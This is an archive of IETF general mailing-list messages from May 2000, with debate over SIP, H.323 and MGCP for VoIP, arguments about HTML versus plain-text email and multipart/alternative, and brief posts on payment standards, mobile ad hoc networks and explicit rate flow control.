Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
Sez "Masataka Ohta" <[EMAIL PROTECTED]>
> > H.323 is defined for a LAN environment, not for telephone lines.
>
> For telephony people, the IP protocol is for a LAN environment
> that there is no difference between H.323, SIP, TELNET, or DNS
> for that matter.
"Telephony people" are not relevant here, since we're talking about
VoIP.
> As I said:
>
> > >For VoIP over telephony networks
Your statements don't make sense; "VoIP over telephony networks" is an
oxymoron, since VoIP is, by definition, over an IP network.
> some protocol is necessary between two telephony networks.
>
> FYI, there is a protocol called TBGP proposed in IETF for the purpose.
TBGP is the proposed method for binding E.164 numbers to telephony
domains, much like DNS binds names to IP addresses. One would still use
SIP (or equivalent) to actually complete the call.
> > If you want to use ITU protocols, please choose some other numbers.
>
> So, you are saying SGCP/MGCP are wrong to use 323.
>
> Fine.
No, he's suggesting that if you wish to use an ITU protocol, H.323 is
not the correct one. Perhaps Q.931?
> FYI, in my design of "The Simple Internet Phone":
>
> If you are interested in Internet telephony, see you at
> INET'2000 in Yokohama for the presentation of our paper
> "The Simple Internet Phone".
Please let us know the URL where you'll be publishing this paper, as
some of us may not be inclined to fly to Yokohama to hear about yet
another non-standard, proprietary telephony protocol.
> I chose to keep using 164 (sorry, not 42) at least for the time being,
> because it is the easiest way to let subscribers replace telephony
> network with the Internet.
MGCP/SGCP/Megaco directly use E.164 numbers. SIP allows users to see
only E.164 numbers during a transition period, though it becomes much
more pwoerful when you move to a more expressive namespace.
[from a prior message]
> As I pointed it out with regard to iMODE and WAP, an attempt to
> promote protocols like SIP, a NAT friendly protocol even more
> complex than H.323
SIP may or may not be NAT-friendly, a point which is best left to other
(time-wasting) threads. I would love to see any explanation of how SIP
is more complex than H.323; maybe you have them backwards?
> was based on a wrong strategy destroying
> the Internet into a collection of mostly-non-IP networks connected
> by application/transport gateways with mostly-non-IETF
> application/transport protocols.
SIP is not, as you state, based on a strategy of building non-IP
networks and connecting them with non-IETF protocols; in fact, it's
quite the opposite. SIP allows the replacement of non-IP (ie. legacy
telephony) networks and non-IETF (ie. ITU) protocols; in the ideal SIP
world, legacy telephony would cease to exist.
While a bit dated, Henning Schulzrinne and Jonathan Rosenberg's paper
has quite a bit of detail on the subject:
http://www.cs.columbia.edu/~hgs/papers/Schu9807_Comparison.ps.gz
> Masataka Ohta
S
| | Stephen Sprunk, K5SSS, CCIE #3723
:|: :|: Network Consulting Engineer, NSA
:|||: :|||: 14875 Landmark Blvd #400; Dallas, TX
.:|||||||:..:|||||||:. Email: [EMAIL PROTECTED]
>From owner-ietf-outbound Mon May 15 17:40:39 2000
Received: by ietf.org (8.9.1a/8.9.1a) id RAA10439
for [EMAIL PROTECTED]; Mon, 15 May 2000 17:40:02 -0400 (EDT)
Received: from necom830.hpcl.titech.ac.jp (necom830.hpcl.titech.ac.jp [131.112.32.132])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id RAA10390
for <[EMAIL PROTECTED]>; Mon, 15 May 2000 17:34:13 -0400 (EDT)
From: Masataka Ohta <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
Received: by necom830.hpcl.titech.ac.jp (8.6.11/TM2.1)
id GAA14698; Tue, 16 May 2000 06:15:24 +0900
Subject: Re: Any comparison Study on MGCP vs H.323, MGCP vs SIP
In-Reply-To: <01b601bfbe9b$33637e70$2f2544ab@glock> from Stephen Sprunk at "May
15, 2000 12:35:56 pm"
To: Stephen Sprunk <[EMAIL PROTECTED]>
Date: Tue, 16 May 2000 06:15:22 +0859 ()
CC: Harald Tveit Alvestrand <[EMAIL PROTECTED]>,
Christian Huitema <[EMAIL PROTECTED]>,
"'Yixin Zhu'" <[EMAIL PROTECTED]>, [EMAIL PROTECTED]
X-Mailer: ELM [version 2.4ME+ PL68 (25)]
X-Loop: [EMAIL PROTECTED]
Stephen Sprunk;
I dare reply because your mail demonstrates common misunderstandings
by people outside of the Internet.
> > > H.323 is defined for a LAN environment, not for telephone lines.
> >
> > For telephony people, the IP protocol is for a LAN environment
> > that there is no difference between H.323, SIP, TELNET, or DNS
> > for that matter.
>
> "Telephony people" are not relevant here, since we're talking about
> VoIP.
Huh?
> > As I said:
> >
> > > >For VoIP over telephony networks
>
> Your statements don't make sense; "VoIP over telephony networks" is an
> oxymoron, since VoIP is, by definition, over an IP network.
Some IP networks are pure telephony networks.
Only one IP network in the world is the Internet.
> > > If you want to use ITU protocols, please choose some other numbers.
> >
> > So, you are saying SGCP/MGCP are wrong to use 323.
> >
> > Fine.
>
> No, he's suggesting that if you wish to use an ITU protocol, H.323 is
> not the correct one. Perhaps Q.931?
He is not saying anything meaningful.
> MGCP/SGCP/Megaco directly use E.164 numbers. SIP allows users to see
The context is that Yixin said something about S/MGCP and 323 and
Chrisitian acknowledged. I know the relevance is meaningless.
> > FYI, in my design of "The Simple Internet Phone":
> >
> > If you are interested in Internet telephony, see you at
> > INET'2000 in Yokohama for the presentation of our paper
> > "The Simple Internet Phone".
>
> Please let us know the URL where you'll be publishing this paper, as
> some of us may not be inclined to fly to Yokohama to hear about yet
> another non-standard, proprietary telephony protocol.
You seem to have no knowledge on INET and IETF.
Signature of Vint will be a good starter for you.
Or, ask someone who knows something about not only IP networks but
also the Internet.
> SIP is not, as you state, based on a strategy of building non-IP
> networks and connecting them with non-IETF protocols; in fact, it's
> quite the opposite. SIP allows the replacement of non-IP (ie. legacy
> telephony) networks and non-IETF (ie. ITU) protocols; in the ideal SIP
> world, legacy telephony would cease to exist.
We, IETF, are for the Internet, not merely IP.
Masataka Ohta
>From owner-ietf-outbound Mon May 15 17:50:12 2000
Received: by ietf.org (8.9.1a/8.9.1a) id RAA10577
for [EMAIL PROTECTED]; Mon, 15 May 2000 17:50:02 -0400 (EDT)
Received: from sigma.cisco.com (sigma.cisco.com [171.69.63.142])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id RAA10445
for <[EMAIL PROTECTED]>; Mon, 15 May 2000 17:40:19 -0400 (EDT)
Received: (from dhaval@localhost)
by sigma.cisco.com (8.8.8-Cisco List Logging/8.8.8) id OAA18531;
Mon, 15 May 2000 14:38:41 -0700 (PDT)
From: Dhaval Shah <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
Subject: Re: Any comparison Study on MGCP vs H.323, MGCP vs SIP
To: [EMAIL PROTECTED] (Stephen Sprunk)
Date: Mon, 15 May 2000 14:38:40 -0700 (PDT)
Cc: [EMAIL PROTECTED] (Masataka Ohta),
[EMAIL PROTECTED] (Harald Tveit Alvestrand),
[EMAIL PROTECTED] (Christian Huitema),
[EMAIL PROTECTED] ('Yixin Zhu'), [EMAIL PROTECTED]
In-Reply-To: <01b601bfbe9b$33637e70$2f2544ab@glock> from "Stephen Sprunk" at May 15,
2000 12:35:56 PM
X-Mailer: ELM [version 2.5 PL1]
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
Hi,
> > As I said:
> >
> > > >For VoIP over telephony networks
>
> Your statements don't make sense; "VoIP over telephony networks" is an
> oxymoron, since VoIP is, by definition, over an IP network.
>
> > some protocol is necessary between two telephony networks.
> >
> > FYI, there is a protocol called TBGP proposed in IETF for the purpose.
Just a minor correction. The new name for this protocol is TRIP.
Thanx,
Dhaval
>
> TBGP is the proposed method for binding E.164 numbers to telephony
> domains, much like DNS binds names to IP addresses. One would still use
> SIP (or equivalent) to actually complete the call.
>From owner-ietf-outbound Mon May 15 18:30:11 2000
Received: by ietf.org (8.9.1a/8.9.1a) id SAA11011
for [EMAIL PROTECTED]; Mon, 15 May 2000 18:30:02 -0400 (EDT)
Received: from localhost.localdomain (thibault.org [207.8.144.3])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id SAA10925
for <[EMAIL PROTECTED]>; Mon, 15 May 2000 18:22:23 -0400 (EDT)
Received: from ecal.com (localhost [127.0.0.1])
by localhost.localdomain (8.9.3/8.9.3) with ESMTP id SAA08442
for <[EMAIL PROTECTED]>; Mon, 15 May 2000 18:22:00 -0400
Sender: [EMAIL PROTECTED]
Message-ID: <[EMAIL PROTECTED]>
Date: Mon, 15 May 2000 18:22:00 -0400
From: John Stracke <[EMAIL PROTECTED]>
X-Mailer: Mozilla 4.72 [en] (X11; U; Linux 2.2.14-5.0 i586)
X-Accept-Language: en
MIME-Version: 1.0
To: [EMAIL PROTECTED]
Subject: HTML email
References: <[EMAIL PROTECTED]>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
Vernon Schryver wrote:
> The practice of sending both HTML and cleartext of supposedly the same
> message reflects very poorly on those who do it intentionally and on those
> who cause MUA's to trick others into doing it unintentionally. Never mind
> the security issues, but consider only the wastes of disk space, CPU
> processing, network bandwidth, and the inevitable differences between the
> two versions. If the two messages were the same, then there would be no
> excuse for sending both. If they differ, then one must be wrong, and
> sending both is worse than a waste.
So why does multipart/alternative exist?
--
/==============================================================\
|John Stracke | http://www.ecal.com |My opinions are my own.|
|Chief Scientist |=============================================|
|eCal Corp. |"I lost an 7-foot boa constrictor once in our|
|[EMAIL PROTECTED]|house." --Gary Larson on his youth |
\==============================================================/
>From owner-ietf-outbound Mon May 15 19:40:31 2000
Received: by ietf.org (8.9.1a/8.9.1a) id TAA11523
for [EMAIL PROTECTED]; Mon, 15 May 2000 19:40:01 -0400 (EDT)
Received: from calcite.rhyolite.com (calcite.rhyolite.com [38.159.140.3])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id TAA11478
for <[EMAIL PROTECTED]>; Mon, 15 May 2000 19:32:06 -0400 (EDT)
Received: (from vjs@localhost)
by calcite.rhyolite.com (8.9.3/calcite) id RAA29411
for [EMAIL PROTECTED] env-from <vjs>;
Mon, 15 May 2000 17:32:06 -0600 (MDT)
Date: Mon, 15 May 2000 17:32:06 -0600 (MDT)
From: Vernon Schryver <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: Re: HTML email
X-Loop: [EMAIL PROTECTED]
> From: John Stracke <[EMAIL PROTECTED]>
> > The practice of sending both HTML and cleartext of supposedly the same
> > message reflects very poorly on those who do it intentionally and on those
> > who cause MUA's to trick others into doing it unintentionally. Never mind
> > the security issues, but consider only the wastes of disk space, CPU
> > processing, network bandwidth, and the inevitable differences between the
> > two versions. If the two messages were the same, then there would be no
> > excuse for sending both. If they differ, then one must be wrong, and
> > sending both is worse than a waste.
>
> So why does multipart/alternative exist?
Perhaps in theory, it exists for the reasons implied by RFC 2046,
especially the last part of section 5.1.4 or in the scenario described
in RFC 1766. There are also RFC 2447 and RFC 2532. They all seem to
involve situations where the two messages are not identical, but the
having a wrong version is better than none at all and which cannot
be predicted in order to avoid the waste.
However, most of the vast quantity of objective evidence implies
that multipart/alternative exists so that people can look stupid
and technically incompetent by sending plaintext with HTML that
when rendered looks practically identical to the plaintext.
The remaining evidence implies that multipart/alternative exists
to trick unwary recipients into rendering HTML containing things
they would be wise to not let their computers evaluate, starting
with porn (with all of its modern legal dangers) and tricky URLs
(e.g. the concrete example recently displayed here), and continuing
to other things with significant security problems.
When was the last time you received a multipart/alternative message that
did not make the sender look stupid, malicious, or both? I can't remember
ever receiving any other kind of multipart/alternative. Maybe that's
why so many competent people apologize when they realize they've been
tricked by a MUA into sending visually identical HTML and plaintext.
Vernon Schryver [EMAIL PROTECTED]
>From owner-ietf-outbound Mon May 15 20:20:15 2000
Received: by ietf.org (8.9.1a/8.9.1a) id UAA11945
for [EMAIL PROTECTED]; Mon, 15 May 2000 20:20:01 -0400 (EDT)
Received: from A4.JCK.COM (ns.jck.com [209.187.148.211])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id UAA11878
for <[EMAIL PROTECTED]>; Mon, 15 May 2000 20:11:46 -0400 (EDT)
Received: from P2 ("port 1174"@[209.187.148.217])
by a4.jck.com (PMDF V6.0-23 #40360) with ESMTP id <[EMAIL PROTECTED]>
for [EMAIL PROTECTED]; Mon, 15 May 2000 20:12:41 -0400 (EDT)
Date: Mon, 15 May 2000 20:11:45 -0400
From: John C Klensin <[EMAIL PROTECTED]>
Subject: Re: HTML email
In-reply-to: <[EMAIL PROTECTED]>
To: John Stracke <[EMAIL PROTECTED]>
Cc: [EMAIL PROTECTED]
Message-id: <643798242.958421505@P2>
MIME-version: 1.0
X-Mailer: Mulberry/2.0.0 (Win32)
Content-type: text/plain; charset=us-ascii
Content-transfer-encoding: 7bit
Content-disposition: inline
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
--On Monday, 15 May, 2000 18:22 -0400 John Stracke
<[EMAIL PROTECTED]> wrote:
> Vernon Schryver wrote:
>
>> The practice of sending both HTML and cleartext of supposedly
>> the same message reflects very poorly on those who do it
>> intentionally and on those who cause MUA's to trick others
>> into doing it unintentionally. Never mind the security
>>...
> So why does multipart/alternative exist?
(i) For those few situations in which there is information
content in a "rich" fancy display form that cannot be rendered
in a weaker form that where it is important to get some idea of
the content through. This is clearly a judgement call on the
part of the sender, but the usual mindless attachment of an HTML
part to a plain-text message (to which I assume that Vernon is
most strongly objecting) doesn't add any more information, just
a bit of formatting that the receiving MUA could probably figure
out from a text message if the developer and user were
adequately motivated.
(ii) For situations in which the meaning of multiple rendering
is presumably the same but the string-content is very different.
E.g., one could in theory send a message out in several
different languages, tagging each, and permitting the receiving
MUA to select the message that best matches the
knowledge/usage/skills of the reader.
Of course, the security issues in the latter case are the same
as those that exist anytime you are handed text in a language
you don't understand and some other text that proports to be an
accurate translation of it.
john
>From owner-ietf-outbound Mon May 15 21:20:15 2000
Received: by ietf.org (8.9.1a/8.9.1a) id VAA12599
for [EMAIL PROTECTED]; Mon, 15 May 2000 21:20:02 -0400 (EDT)
Received: from tsx-prime.MIT.EDU (TSX-PRIME.MIT.EDU [18.86.0.76])
by ietf.org (8.9.1a/8.9.1a) with SMTP id VAA12506
for <[EMAIL PROTECTED]>; Mon, 15 May 2000 21:12:17 -0400 (EDT)
Received: by tsx-prime.MIT.EDU
with sendmail-SMI-8.6/1.2, id VAA21938; Mon, 15 May 2000 21:12:12 -0400
Date: Mon, 15 May 2000 21:12:12 -0400
Message-Id: <[EMAIL PROTECTED]>
From: "Theodore Y. Ts'o" <[EMAIL PROTECTED]>
To: John C Klensin <[EMAIL PROTECTED]>
CC: John Stracke <[EMAIL PROTECTED]>, [EMAIL PROTECTED]
In-reply-to: John C Klensin's message of Mon, 15 May 2000 20:11:45 -0400,
<643798242.958421505@P2>
Subject: Re: HTML email
Phone: (781) 391-3464
X-Loop: [EMAIL PROTECTED]
Date: Mon, 15 May 2000 20:11:45 -0400
From: John C Klensin <[EMAIL PROTECTED]>
>> The practice of sending both HTML and cleartext of supposedly
>> the same message reflects very poorly on those who do it
>> intentionally and on those who cause MUA's to trick others
>> into doing it unintentionally. Never mind the security
>>...
> So why does multipart/alternative exist?
(i) For those few situations in which there is information
content in a "rich" fancy display form that cannot be rendered
in a weaker form that where it is important to get some idea of
the content through.
It seems to be usually the case, for most messages that I've seen, that
there's *no* added value to the HTML version. I.e., other than adding
<BR> at the end of lines, and using microsoft-specific font settings at
the beginning of each paragraph (usually all the same), there's nothing
to be gained by using HTML except for bloating the message.
So one question to ask is "why send HTML at all" in those cases? It
would be nice if MUA's could detect this case, and only send plain-text,
and reserve HTML only for when it's actually adding something of value.
This is clearly a judgement call on the part of the sender, but the
usual mindless attachment of an HTML part to a plain-text message (to
which I assume that Vernon is most strongly objecting) doesn't add
any more information, just a bit of formatting that the receiving MUA
could probably figure out from a text message if the developer and
user were adequately motivated.
I wonder how many people are still using plain-text, non-HTML enabled
mail readers? It still happens on some mailing list, where someone will
send a base-64 encoded html'ified message (usually using MS Outlook),
and someone will send back "try again in English; I don't read that MIME
crap."
For a long time, if you wanted to guarantee that messages issued by your
MUA would be read, it was wise to send it both in plain-text and HTML
form, with the plain-text form first --- and non-base-64 encoded if at
all possible. For certain recipients, this is still the case.
- Ted
>From owner-ietf-outbound Tue May 16 00:30:27 2000
Received: by ietf.org (8.9.1a/8.9.1a) id AAA16147
for [EMAIL PROTECTED]; Tue, 16 May 2000 00:30:01 -0400 (EDT)
Received: from black-ice.cc.vt.edu ([EMAIL PROTECTED] [128.173.14.71])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id AAA16103
for <[EMAIL PROTECTED]>; Tue, 16 May 2000 00:24:25 -0400 (EDT)
From: [EMAIL PROTECTED]
Received: from black-ice.cc.vt.edu (valdis@LOCALHOST [127.0.0.1])
by black-ice.cc.vt.edu (8.11.0.Beta0/8.11.0.Beta0) with ESMTP id e4G4OOx29928;
Tue, 16 May 2000 00:24:24 -0400
Message-Id: <[EMAIL PROTECTED]>
To: John Stracke <[EMAIL PROTECTED]>
cc: [EMAIL PROTECTED]
Subject: Re: HTML email
In-reply-to: Your message of "Mon, 15 May 2000 18:22:00 EDT."
<[EMAIL PROTECTED]>
X-URL: http://black-ice.cc.vt.edu/~valdis/
X-Face: 34C9$Ewd2zeX+\!i1BA\j{ex+$/V'JBG#;3_noWWYPa"|,I#`R"{n@w>#:{)FXyiAS7(8t(
^*w5O*!8O9YTe[r{e%7(yVRb|qxsRYw`7J!`AM}m_SHaj}f8eb@d^L>BrX7iO[<!v4-0bVIpaxF#-)
%9#a9h6JXI|T|8o6t\V?kGl]Q!1V]GtNliUtz:3},0"hkPeBuu%E,j(:\iOX-P,t7lRR#
References: <[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
Date: Tue, 16 May 2000 00:24:23 -0400
X-Loop: [EMAIL PROTECTED]
On Mon, 15 May 2000 18:22:00 EDT, John Stracke <[EMAIL PROTECTED]> said:
> So why does multipart/alternative exist?
Well, when we were designing the MIME spec, we went to great lengths
to cover all the bases - in fact, I've seen one very good use of
multipart/alternative by somebody with crippling RSI.
He got into the habit of sending commentary to a mailing list as
multipart/alternative - one part being a *very* brief summary of
his commentary (usually a sentence or two tops), and the other being
a message/external-body pointing at a (usually longer) audio file
that he'd record in greater detail - this was in the days before
good speech-to-text software.
Yes, it probably violated the letter of the law just a bit, but
it was certainly in the spirit of it..
Also, remember that we designed it in 1991 or so - the infamous
Green Card Lottery was still 3 years away, AOL wasn't the majority
owner of several northern Virginia counties, and the concept of
a point-and-drool interface for the masses didn't exist yet.
We designed it for the Internet we were hoping for, not for the
one that we actually got....
Valdis Kletnieks
Operating Systems Analyst
Virginia Tech
>From owner-ietf-outbound Tue May 16 00:50:18 2000
Received: by ietf.org (8.9.1a/8.9.1a) id AAA16350
for [EMAIL PROTECTED]; Tue, 16 May 2000 00:50:02 -0400 (EDT)
Received: from arcc.or.ke (root@[212.49.87.254])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id AAA16318
for <[EMAIL PROTECTED]>; Tue, 16 May 2000 00:44:39 -0400 (EDT)
Received: from du131.arcc.or.ke ([199.2.222.131])
by arcc.or.ke (8.9.3/8.9.3) with SMTP id IAA07081;
Tue, 16 May 2000 08:06:31 +0300 (EAT)
Date: Tue, 16 May 2000 08:06:31 +0300 (EAT)
Message-Id: <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
X-Mailer: Windows Eudora Pro Version 2.1.2
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: Anne & Lynn Wheeler <[EMAIL PROTECTED]>, [EMAIL PROTECTED]
From: Musandu <[EMAIL PROTECTED]>
Subject: re: Financial Stnadards Work group?
X-Loop: [EMAIL PROTECTED]
I do not quiet agree with the current standards, they are a pain in the
neck. E.g ( Just one example ) I want the internet debit card and the
devices for charging them to be standard hardware available in any computer
store. This will allow one to chose any bank or service provider ( instead
of your money going proprietory ): imagine buying a new modem or router
every time you change ISPs or buying different kinds of printers for
printing from different web sites. That is the position of debit card
recharging buying a new device each time you change the service provider.
The IETF can help or do you hold alternative views ( give me some
recharging devices that allow change overs )??
Yours sincerely,
Nyagudi Musandu
At 10:28 14/05/00 -0700, you wrote:
>Musandu <[EMAIL PROTECTED]> writes:
>
> >It may just be time for the IETF to develop a financial standards
> >work group separate from the applications work group. I can even >forsee
>a Simple Cash Transfer Protocol? any objections?
>
>There is an ANSI Financial Standards body (X9) which is also chair of the
>ISO Financial Standards group.
>
>The electronic commerce payments working group (X9A10) has a draft standard
>for all electronic retail payments (debit, credit, pre-paid, electronic
>cash, etc) .. X9.59.
>
>
>misc. ref
>
>http://www.x9.org/
>http://www.x9.org/main_organization.html
>http://www.x9.org/subcomms/x9a/general/public/general.html
>http://www.tc68.org/
>http://www.x9.org/n20.html
>http://www.garlic.com/~lynn/
>http://www.garlic.com/~lynn/99.html#224
>http://www.garlic.com/~lynn/8583flow.htm
>http://www.garlic.com/~lynn/draft-wheeler-ipki-aads-01.txt
>
>& of course my rfc index is also at:
>
>http://www.garlic.com/~lynn/rfcietff.htm
>
>as well as ietf, payments, security, X9F, and financial glossaries
>
>
>
>--
>Anne & Lynn Wheeler [EMAIL PROTECTED], [EMAIL PROTECTED]
> http://www.garlic.com/~lynn/ http://www.adcomsys.net/lynn/
>
>
>
>From owner-ietf-outbound Tue May 16 04:40:22 2000
Received: by ietf.org (8.9.1a/8.9.1a) id EAA29643
for [EMAIL PROTECTED]; Tue, 16 May 2000 04:40:02 -0400 (EDT)
Received: from dokka.maxware.no (dokka.maxware.no [195.139.236.69])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id EAA29574
for <[EMAIL PROTECTED]>; Tue, 16 May 2000 04:32:59 -0400 (EDT)
Received: from langfjella.Alvestrand.no (langfjella.maxware.no [10.128.1.123])
by dokka.maxware.no (8.9.3/8.9.3) with ESMTP id KAA25460;
Tue, 16 May 2000 10:32:51 +0200
Message-Id: <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
X-Mailer: QUALCOMM Windows Eudora Version 4.3.1
Date: Tue, 16 May 2000 10:29:39 +0200
To: Vernon Schryver <[EMAIL PROTECTED]>, [EMAIL PROTECTED]
From: Harald Tveit Alvestrand <[EMAIL PROTECTED]>
Subject: Re: HTML email
In-Reply-To: <[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
X-Loop: [EMAIL PROTECTED]
At 17:32 15.05.2000 -0600, Vernon Schryver wrote:
>When was the last time you received a multipart/alternative message that
>did not make the sender look stupid, malicious, or both? I can't remember
>ever receiving any other kind of multipart/alternative.
FWIW, as a lone Eudora user in a pond of Outlookers, I find Eudora's HTML
rendering of messages where people have used Outlook's "reply inline using
a different color" to be slightly less hideous than Outlook's idea on how
to demontstrate that it is not trivial to make a legible rendering of this
particular function in ASCII.
Even if you want to argue that using this Outlook function makes the sender
look stupid, there's value for me as the recipient in seeing the HTML
rendering and not the ASCII rendering.
Small data point.
Harald
--
Harald Tveit Alvestrand, EDB Maxware, Norway
[EMAIL PROTECTED]
>From owner-ietf-outbound Tue May 16 07:50:44 2000
Received: by ietf.org (8.9.1a/8.9.1a) id HAA02409
for [EMAIL PROTECTED]; Tue, 16 May 2000 07:50:02 -0400 (EDT)
Received: from inner.net (avarice.inner.net [199.33.248.2])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id HAA02296
for <[EMAIL PROTECTED]>; Tue, 16 May 2000 07:45:30 -0400 (EDT)
Received: from c8-a.snvl1.sfba.home.com ([216.52.8.30])
by inner.net (8.7.6/8.9.3) with ESMTP id LAA21420
for <[EMAIL PROTECTED]>; Tue, 16 May 2000 11:43:22 GMT
Message-Id: <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.58
Date: Tue, 16 May 2000 07:45:42 +0100
To: [EMAIL PROTECTED]
From: RJ Atkinson <[EMAIL PROTECTED]>
Subject: Re: HTML email
In-Reply-To: <[EMAIL PROTECTED]>
References: <John C Klensin's message of Mon, 15 May 2000 20:11:45 -0400,
<643798242.958421505@P2>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
X-Loop: [EMAIL PROTECTED]
At 02:12 16-05-00 , Theodore Y. Ts'o wrote:
>It seems to be usually the case, for most messages that I've seen, that
>there's *no* added value to the HTML version. I.e., other than adding
><BR> at the end of lines, and using microsoft-specific font settings at
>the beginning of each paragraph (usually all the same), there's nothing
>to be gained by using HTML except for bloating the message.
>
>So one question to ask is "why send HTML at all" in those cases? It
>would be nice if MUA's could detect this case, and only send plain-text,
>and reserve HTML only for when it's actually adding something of value.
Its not uncommon for sales folks to use bold or colour in fonts to
highlight some item they want the reader to pay attention to. Its a
matter of opinion whether this is good value.
I will note that I routinely discard all HTML-only or RichText-only email
without bothering to try to read it. So folks who want me to read something
had better be sending at least US-ASCII plain-text. Its well known that
I'm an old fogey, so this likely surprises no one.
>I wonder how many people are still using plain-text, non-HTML enabled
>mail readers? It still happens on some mailing list, where someone will
>send a base-64 encoded html'ified message (usually using MS Outlook),
>and someone will send back "try again in English; I don't read that MIME
>crap."
I do not normally have an HTML-enabled mail reader at hand at work. For
that matter,
its not unheard of for me to read mail over a real TTY (or telnet or
ssh). My mail readers _do_ comply with MIME, but attachments get
saved to the file system where I can read them by opening a separate
application viewer. Over a TTY, it is intrinsically hard to display fancy
text.
For HTML or RichText, I just don't bother with the second application, ever.
>For a long time, if you wanted to guarantee that messages issued by your
>MUA would be read, it was wise to send it both in plain-text and HTML
>form, with the plain-text form first --- and non-base-64 encoded if at
>all possible. For certain recipients, this is still the case.
I'm one of those recipients, so I'd much rather have both plain-text and
fancy, with plain-text first.
Ran
[EMAIL PROTECTED]
>From owner-ietf-outbound Tue May 16 08:20:20 2000
Received: by ietf.org (8.9.1a/8.9.1a) id IAA03306
for [EMAIL PROTECTED]; Tue, 16 May 2000 08:20:04 -0400 (EDT)
Received: from iti-idsc.gov.eg (mail.iti.gov.eg [163.121.12.2])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id IAA03205
for <[EMAIL PROTECTED]>; Tue, 16 May 2000 08:16:07 -0400 (EDT)
Received: from iti-idsc.gov.eg (seg28.iti.idsc.gov.eg [163.121.28.7] (may be forged))
by iti-idsc.gov.eg (8.9.1b+Sun/8.9.1) with ESMTP id PAA00911
for <[EMAIL PROTECTED]>; Tue, 16 May 2000 15:17:01 +0300 (EET DST)
Message-ID: <[EMAIL PROTECTED]>
Date: Mon, 10 May 1999 16:14:50 +0300
From: zozo <[EMAIL PROTECTED]>
X-Mailer: Mozilla 4.72 [en] (WinNT; I)
X-Accept-Language: en
MIME-Version: 1.0
To: [EMAIL PROTECTED]
Subject: Mobile Ad hoc
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
What are the benefits gained from
"Integeration between Mobile IP and Ad hoc networks" ?
>From owner-ietf-outbound Tue May 16 08:30:18 2000
Received: by ietf.org (8.9.1a/8.9.1a) id IAA03614
for [EMAIL PROTECTED]; Tue, 16 May 2000 08:30:03 -0400 (EDT)
Received: from meter.eng.uci.edu ([EMAIL PROTECTED] [128.200.85.3])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id IAA03481
for <[EMAIL PROTECTED]>; Tue, 16 May 2000 08:26:09 -0400 (EDT)
Received: from thomas.eng.uci.edu (thomas.eng.uci.edu [128.200.9.237]) by
meter.eng.uci.edu (8.9.3/) with ESMTP id FAA05789 for <[EMAIL PROTECTED]>; Tue, 16 May
2000 05:26:01 -0700 (PDT)
Received: from localhost (miyer@localhost) by thomas.eng.uci.edu (8.8.8/) with ESMTP
id FAA22028 for <[EMAIL PROTECTED]>; Tue, 16 May 2000 05:26:00 -0700 (PDT)
Date: Tue, 16 May 2000 05:26:00 -0700 (PDT)
From: Mahadevan Iyer <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: Explicit Rate flow control in IP.
Message-ID: <[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Loop: [EMAIL PROTECTED]
I was curious to know why support or a standard for explicit rate flow
control to be provided by ISP's has not been considered in IETF yet.
I hope this general list is the best suited to posting my message.
As we well know, even simple scalable explicit rate protocols similar to
EPRCA or ERICA, to a mention a few, can lead to drastic improvements in
control of queue size, link utilization and fairness at congested ISP
cores.
This in turn could lead to a noticeable improvement in download time for
Web pages and other multimedia transfers to name some simple examples.
How to use the IP packet header to designate if it is a forward/backward
Control packet or not and also to carry control information such as
Explicit Rate, Queue Length, etc? Possibly, carry such detailed
information as payload? After all, Control packets will only arrive only
once a 'while'. I haven't careful thought to this yet.
There are ways in which an IP router can estimate the fair share
(or even the max-min fair share) of available link bandwidth without
having to use *any* kind of per-flow information.
Since the flow control computation needed is per-Control-packet and not
per-data-packet, it should be feasible in most routers.
Of course, the full benefits of explicit rate control will be realized
only if the route for a flow remains fixed. Maintaining such fixed routes
is possible in MPLS networks.
Maybe I am missing some crucial reason, why IETF standards for such
explicit rate control are not advisable..
Mahadevan.
>From owner-ietf-outbound Tue May 16 08:50:43 2000
Received: by ietf.org (8.9.1a/8.9.1a) id IAA04182
for [EMAIL PROTECTED]; Tue, 16 May 2000 08:50:02 -0400 (EDT)
Received: from shell9.ba.best.com ([EMAIL PROTECTED] [206.184.139.140])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id IAA04122
for <[EMAIL PROTECTED]>; Tue, 16 May 2000 08:47:50 -0400 (EDT)
Received: (from bovik@localhost)
